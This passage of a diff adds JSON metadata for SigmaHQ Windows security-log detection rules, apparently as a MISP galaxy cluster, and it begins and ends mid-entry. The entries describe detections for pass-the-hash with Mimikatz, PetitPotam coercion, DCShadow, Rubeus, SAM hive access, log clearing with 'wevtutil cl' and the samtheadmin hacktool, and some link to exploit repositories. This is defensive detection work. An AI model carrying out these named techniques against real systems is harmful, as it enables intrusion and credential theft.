"No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "critical", + "falsepositive": [ + "Highly unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects NetNTLM downgrade attack", + "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "value": "NetNTLM Downgrade Attack", + "meta": { + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ], + "creation_date": "2018/03/20", + "filename": "win_security_net_ntlm_downgrade.yml", + "author": "Florian Roth, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "value": "Windows Network Access Suspicious desktop.ini Action", + "meta": { + "refs": [ + "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ], + "creation_date": "2021/12/06", + "filename": "win_security_net_share_obj_susp_desktop_ini.yml", + "author": "Tim Shelton (HAWK.IO)", + "level": "medium", + "falsepositive": [ + "Read only access list authority" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", + "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/10/25", + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", + "author": "Ilyas Ochkov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "value": "Denied Access To Remote Desktop", + "meta": { + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2020/06/27", + "filename": "win_security_not_allowed_rdp_access.yml", + "author": "Pushkarev Dmitry", + "level": "medium", + "falsepositive": [ + "Valid user was not added to RDP group" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "value": "Successful Overpass the Hash Attempt", + "meta": { + "refs": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" + ], + "creation_date": "2018/02/12", + "filename": "win_security_overpass_the_hash.yml", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "level": "high", + "falsepositive": [ + "Runas command-line tool using /netonly parameter" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "value": "Pass the Hash Activity 2", + "meta": { + "refs": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ], + "creation_date": "2019/06/14", + "filename": "win_security_pass_the_hash_2.yml", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "level": "medium", + "falsepositive": [ + "Administrator activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect PetitPotam coerced authentication activity.", + "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "value": "Possible PetitPotam Coerce Authentication Attempt", + "meta": { + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ], + "creation_date": "2021/09/02", + "filename": "win_security_petitpotam_network_share.yml", + "author": "Mauricio Velazco, Michael Haag", + "level": "high", + "falsepositive": [ + "Unknown. Feedback welcomed." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "value": "PetitPotam Suspicious Kerberos TGT Request", + "meta": { + "refs": [ + "https://github.com/topotam/PetitPotam", + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ], + "creation_date": "2021/09/02", + "filename": "win_security_petitpotam_susp_tgt_request.yml", + "author": "Mauricio Velazco, Michael Haag", + "level": "high", + "falsepositive": [ + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects DCShadow via create new SPN", + "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "value": "Possible DC Shadow Attack", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1207" + ], + "creation_date": "2019/10/25", + "filename": "win_security_possible_dc_shadow.yml", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "level": "medium", + "falsepositive": [ + "Valid on domain controllers; exclude known DCs" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell script installed as a Service", + "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "value": "PowerShell Scripts Installed as Services - Security", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "win_security_powershell_script_installed_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", + "value": "Protected Storage Service Access", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2019/08/10", + "filename": "win_security_protected_storage_service_access.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "value": "Rare Schtasks Creations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "car.2013-08-001", + "attack.t1053.005" + ], + "creation_date": "2017/03/23", + "filename": "win_security_rare_schtasks_creations.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "uuid": "8400629e-79a9-4737-b387-5db940ab2367", + "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "meta": { + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "creation_date": "2019/06/02", + "filename": "win_security_rdp_bluekeep_poc_scanner.yml", + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "RDP login with localhost source address may be a tunnelled login", + "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", + "value": "RDP Login from Localhost", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" + ], + "creation_date": "2019/01/28", + "filename": "win_security_rdp_localhost_login.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "value": "RDP over Reverse SSH Tunnel WFP", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" + ], + "creation_date": "2019/02/16", + "filename": "win_security_rdp_reverse_tunnel.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Programs that connect locally to the RDP port" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", + "value": "Register new Logon Process by Rubeus", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ], + "creation_date": "2019/10/24", + "filename": "win_security_register_new_logon_process_by_rubeus.yml", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "value": "Remote PowerShell Sessions Network Connections (WinRM)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "win_security_remote_powershell_session.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Legitimate use of remote PowerShell execution" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", + "value": "Replay Attack Detected", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_replay_attack_detected.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "value": "Suspicious Computer Account Name Change CVE-2021-42287", + "meta": { + "refs": [ + "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/22", + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects handles requested to SAM registry hive", + "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "value": "SAM Registry Hive Handle Request", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" + ], + "creation_date": "2019/08/12", + "filename": "win_security_sam_registry_hive_handle_request.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "value": "Scheduled Task Deletion", + "meta": { + "refs": [ + "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "car.2013-08-001", + "attack.t1053.005" + ], + "creation_date": "2021/01/22", + "filename": "win_security_scheduled_task_deletion.yml", + "author": "David Strassegger, Tim Shelton", + "level": "low", + "falsepositive": [ + "Software installation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-system users failing to get a handle of the SCM database.", + "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "value": "SCM Database Handle Failure", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1010" + ], + "creation_date": "2019/08/12", + "filename": "win_security_scm_database_handle_failure.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-system users performing privileged operation os the SCM database", + "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", + "value": "SCM Database Privileged Operation", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2019/08/15", + "filename": "win_security_scm_database_privileged_operation.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "value": "Remote WMI ActiveScriptEventConsumers", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2020/09/02", + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "SCCM" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "value": "Service Installed By Unusual Client - Security", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://twitter.com/SBousseaden/status/1490608838701166596", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/09/15", + "filename": "win_security_service_installation_by_unusal_client.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "security", + "logsource.product": "windows" + } + }, + { + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", + "value": "SMB Create Remote File Admin Share", + "meta": { + "refs": [ + "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/08/06", + "filename": "win_security_smb_file_creation_admin_shares.yml", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", + "value": "Addition of Domain Trusts", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2019/12/03", + "filename": "win_security_susp_add_domain_trust.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Legitimate extension of domain structure" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "value": "Addition of SID History to Active Directory Object", + "meta": { + "refs": [ + "https://adsecurity.org/?p=1772", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" + ], + "creation_date": "2017/02/19", + "filename": "win_security_susp_add_sid_history.yml", + "author": "Thomas Patzke, @atc_project (improvements)", + "level": "medium", + "falsepositive": [ + "Migration of an account into a new domain" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Code integrity failures may indicate tampered executables.", + "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "value": "Failed Code Integrity Checks", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ], + "creation_date": "2019/12/03", + "filename": "win_security_susp_codeintegrity_check_failure.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Disk device errors" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "value": "Win Susp Computer Name Containing Samtheadmin", + "meta": { + "refs": [ + "https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" + ], + "tags": [ + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2022/09/09", + "filename": "win_security_susp_computer_name.yml", + "author": "elhoim", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "security", + "logsource.product": "windows" + } + }, + { + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "value": "Password Change on Directory Service Restore Mode (DSRM) Account", + "meta": { + "refs": [ + "https://adsecurity.org/?p=1714", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2017/02/19", + "filename": "win_security_susp_dsrm_password_change.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Initial installation of a domain controller" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "value": "Security Eventlog Cleared", + "meta": { + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2017/01/10", + "filename": "win_security_susp_eventlog_cleared.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", + "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", + "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_explicit_credentials.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects failed logins with multiple accounts from a single process on the system.", + "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", + "value": "Multiple Users Failing to Authenticate from Single Process", + "meta": { + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ], + "creation_date": "2021/06/01", + "filename": "win_security_susp_failed_logons_single_process.yml", + "author": "Mauricio Velazco", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", + "value": "Failed Logins with Different Accounts from Single Source System", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2017/01/10", + "filename": "win_security_susp_failed_logons_single_source.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious failed logins with different user accounts from a single source system", + "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", + "value": "Failed NTLM Logins with Different Accounts from Single Source System", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ], + "creation_date": "2017/01/10", + "filename": "win_security_susp_failed_logons_single_source2.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects multiple 